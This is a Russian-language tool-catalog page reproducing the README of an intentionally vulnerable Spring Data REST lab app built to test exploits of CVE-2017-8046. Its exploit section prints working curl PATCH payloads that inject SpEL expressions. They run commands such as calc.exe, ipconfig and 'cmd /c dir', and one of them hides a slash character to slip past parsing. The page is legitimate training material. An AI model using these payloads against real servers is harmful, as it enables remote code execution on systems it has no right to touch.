Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SpringBreakVulnerableApp — ПРЕДУПРЕЖДЕНИЕ: Это уязвимое приложение для проверки эксплойта уязвимости Spring Break (CVE-2017-8046). Запускайте на свой страх и риск! | Kitploit
Инструменты/GitHubGitHub/m3ssap0/springbreakvulnerableapp
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubm3ssap0/springbreakvulnerableapp

SpringBreakVulnerableApp

ПРЕДУПРЕЖДЕНИЕ: Это уязвимое приложение для проверки эксплойта уязвимости Spring Break (CVE-2017-8046). Запускайте на свой страх и риск!

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
14107 лет назадЕщё не проверено

Уязвимое приложение Spring Break

Это уязвимое приложение для тестирования эксплойта уязвимости Spring Break (CVE-2017-8046).

ПРЕДУПРЕЖДЕНИЕ!

Это приложение содержит серьезные уязвимости безопасности. Запускайте его на свой страх и риск! Рекомендуется использовать резервную копию и изолированную среду (например, виртуальную машину с последним снимком и сетью только для хоста). Не загружайте это приложение на серверы, доступные из Интернета, так как они будут скомпрометированы.

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Я не несу ответственности за то, как кто-либо использует это приложение (SpringBreakVulnerableApp). Единственная цель этого приложения — быть тестовым сценарием для эксплойта Spring Break, и оно не должно использоваться в злонамеренных целях. Если ваш сервер будет скомпрометирован в результате установки SpringBreakVulnerableApp, это не моя ответственность; это ответственность лица(лиц), которые загрузили и установили его.

Информация об уязвимости

  • CVE-ID: CVE-2017-8046
  • Ссылка: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
  • Описание: Вредоносные запросы PATCH, отправленные на серверы spring-data-rest в Pivotal Spring Data REST версий до 2.5.12, 2.6.7, 3.0 RC3, Spring Boot версий до 2.0.0M4 и Spring Data релизных поездов до Kay-RC3, могут использовать специально сформированные JSON-данные для выполнения произвольного Java-кода.

Использование

Приложение можно запустить с помощью следующей команды Maven.

root@kitploit:~
mvn spring-boot:run

Жирный jar-файл можно создать с помощью следующей команды Maven.

root@kitploit:~
mvn clean install spring-boot:repackage

Для вставки данных можно использовать следующую команду curl.

root@kitploit:~
curl -i -X POST -H "Content-Type: application/json" -d '{ "name" : "Test", "attribute" : "foo"}' http://hostname:port/entity

Эксплойт

Вероятно, самый простой эксплойт — следующий запрос.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Thread).sleep(10000).x", "value" : "pwned" }]' "http://hostname:port/entity/1"

В Windows процесс calc.exe можно запустить с помощью следующего запроса. Аналогичные запросы можно использовать для запуска произвольных команд.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(java.lang.Runtime).getRuntime().exec(\"calc.exe\").x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

Для получения вывода запущенных команд можно использовать некоторые "гаджеты", предоставляемые кодом Spring Framework. К счастью, внешние зависимости не требуются. Например, результат выполнения команды ipconfig можно получить с помощью следующего запроса.

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ipconfig\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

В Windows команду cmd /c dir и другие подобные команды можно запустить с помощью следующего запроса. Обратите внимание на трюк, используемый для вставки символа косой черты без явного указания значения (то есть явные слеши заменяются точками перед фактическим разбором).

root@kitploit:~
curl --request PATCH -H "Content-Type: application/json-patch+json" -d '[{ "op" : "replace", "path" : "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"cmd \" + T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F)) + \"c dir\").getInputStream(), T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x", "value" : "pwned" }]' "http://hostname:port/entity/1/"

Программа на Java для эксплуатации этой уязвимости доступна здесь.

Авторы

  • Antonio Francesco Sardella - реализация - m3ssap0

Лицензия

Этот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.txt.

Благодарности

  • Man Yue Mo исследователь безопасности, обнаруживший уязвимость
Скачать инструмент